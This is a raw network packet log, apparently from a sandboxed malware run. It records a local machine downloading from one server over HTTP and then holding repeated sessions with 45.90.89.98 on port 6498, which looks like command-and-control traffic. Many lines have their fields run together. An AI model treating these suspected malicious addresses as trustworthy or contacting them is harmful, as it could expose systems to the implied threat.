Oct 23, 2024 17:27:20.292447090 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.292460918 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.292474031 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.292510033 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.292678118 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.292691946 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.292711973 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.292741060 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.292810917 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.292862892 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.293205023 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.293679953 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.293735027 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.314702034 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.314718962 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.314732075 CEST  80     49173  85.215.206.82  192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.314794064 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.314977884 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.314990997 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315002918 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315016031 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315032959 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.315058947 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.315371037 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315426111 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315438986 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315449953 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315473080 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.315491915 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.336639881 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336658001 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336669922 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336757898 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336769104 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336770058 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.336781979 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336931944 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336944103 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336944103 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.336966038 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.337471962 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.337482929 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.337502003 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.337518930 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.337573051 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.337585926 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.337624073 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.377804995 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.377895117 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.377907991 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.377978086 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.432709932 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.432753086 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.432806015 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.432967901 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.432981014 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.432996035 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.433022022 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.433331013 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.433363914 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.433372974 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.433377981 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.433388948 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.433399916 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.433418036 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.438524961 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438536882 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438548088 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438560009 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438571930 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438581944 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.438591957 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438597918 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438599110 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438600063 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.438604116 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438606024 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438610077 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438626051 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438638926 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.438678980 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.459417105 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459435940 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459450960 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459464073 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459475994 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459489107 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459501982 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459512949 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459518909 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459523916 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459531069 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459541082 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.459542990 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459559917 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459702969 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.459702969 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.496953011 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.496978045 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.496993065 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.497006893 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.497030973 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.530680895 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.530699015 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.530715942 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.530738115 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.550415039 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550491095 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.550553083 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550570011 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550607920 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.550700903 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550714970 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550719023 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550749063 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.550971985 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550985098 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550996065 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.551019907 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.552999020 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.553011894 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.553030968 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.553050041 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.553145885 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.553152084 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.553196907 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.554461956 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.554567099 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.554613113 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.605833054 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.663806915 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:20.669222116 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.669285059 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:20.676645041 CEST491746498192.168.2.2245.90.89.98
Oct 23, 2024 17:27:20.682441950 CEST | 6498 | 49174 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:21.576637030 CEST | 6498 | 49174 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:21.729759932 CEST | 6498 | 49174 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:21.729863882 CEST | 49174 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:21.733961105 CEST | 49174 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:21.739284039 CEST | 6498 | 49174 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:21.740298986 CEST | 49174 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:21.746633053 CEST | 6498 | 49174 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:22.021730900 CEST | 6498 | 49174 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:22.023233891 CEST | 49174 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:22.028851986 CEST | 6498 | 49174 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:22.174499989 CEST | 6498 | 49174 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:22.177515030 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:22.182923079 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:22.182981968 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:22.186734915 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:22.192121983 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:22.380940914 CEST | 49176 | 80 | 192.168.2.22 | 178.237.33.50
Oct 23, 2024 17:27:22.381036043 CEST | 49174 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:22.386450052 CEST | 80 | 49176 | 178.237.33.50 | 192.168.2.22
Oct 23, 2024 17:27:22.387331963 CEST | 49176 | 80 | 192.168.2.22 | 178.237.33.50
Oct 23, 2024 17:27:22.412441969 CEST | 49176 | 80 | 192.168.2.22 | 178.237.33.50
Oct 23, 2024 17:27:22.417975903 CEST | 80 | 49176 | 178.237.33.50 | 192.168.2.22
Oct 23, 2024 17:27:23.097352982 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.237325907 CEST | 80 | 49176 | 178.237.33.50 | 192.168.2.22
Oct 23, 2024 17:27:23.239084959 CEST | 49176 | 80 | 192.168.2.22 | 178.237.33.50
Oct 23, 2024 17:27:23.243182898 CEST | 49174 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.248519897 CEST | 6498 | 49174 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.249929905 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.249979973 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.254133940 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.259427071 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.259485006 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.265002966 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.546442986 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.546459913 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.546473026 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.546497107 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.546509027 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.546519041 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.546520948 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.546550035 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.546556950 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.546636105 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.546650887 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.546684027 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.546772003 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.546785116 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.546824932 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.547568083 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.547580004 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.547621965 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.551948071 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.551987886 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.552000046 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.552054882 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.699534893 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.699548960 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.699565887 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.699615002 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.699636936 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.699649096 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.699673891 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.699717999 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.699757099 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.700100899 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.700150013 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.700160027 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.700186014 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.700481892 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.700520992 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.700555086 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.700563908 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.700598955 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.700659037 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.701056004 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.701083899 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.701091051 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.701982975 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.818425894 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.818454027 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.818465948 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.818497896 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.818532944 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.818546057 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.818558931 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.818578005 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.818816900 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.818852901 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.818869114 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.818883896 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.818914890 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.818944931 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.819377899 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.819415092 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.819427967 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.819442034 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.819478989 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.821134090 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.852672100 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.852688074 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.852756977 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.937357903 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.937407970 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.937455893 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.937467098 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.937482119 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.937550068 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.937602043 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.937684059 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.937696934 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.937707901 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.937722921 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.937750101 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.937907934 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.937961102 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.937972069 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.937998056 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:23.938079119 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.938091993 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:23.938117981 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:24.029297113 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.029309988 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.029366016 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:24.055874109 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.055895090 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.055906057 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.055923939 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:24.056040049 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.056052923 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.056066990 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:24.056091070 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:24.056353092 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.056426048 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.056438923 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.056503057 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:24.056615114 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.056627035 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.056653976 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:24.057081938 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.057125092 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:24.057192087 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.057205915 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.057241917 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:24.057305098 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.058602095 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:24.147413015 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.147456884 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.147516012 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:24.174738884 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.174772024 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.174782038 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:24.174823046 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:24.174863100 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.174876928 CEST64984917545.90.89.98192.168.2.22
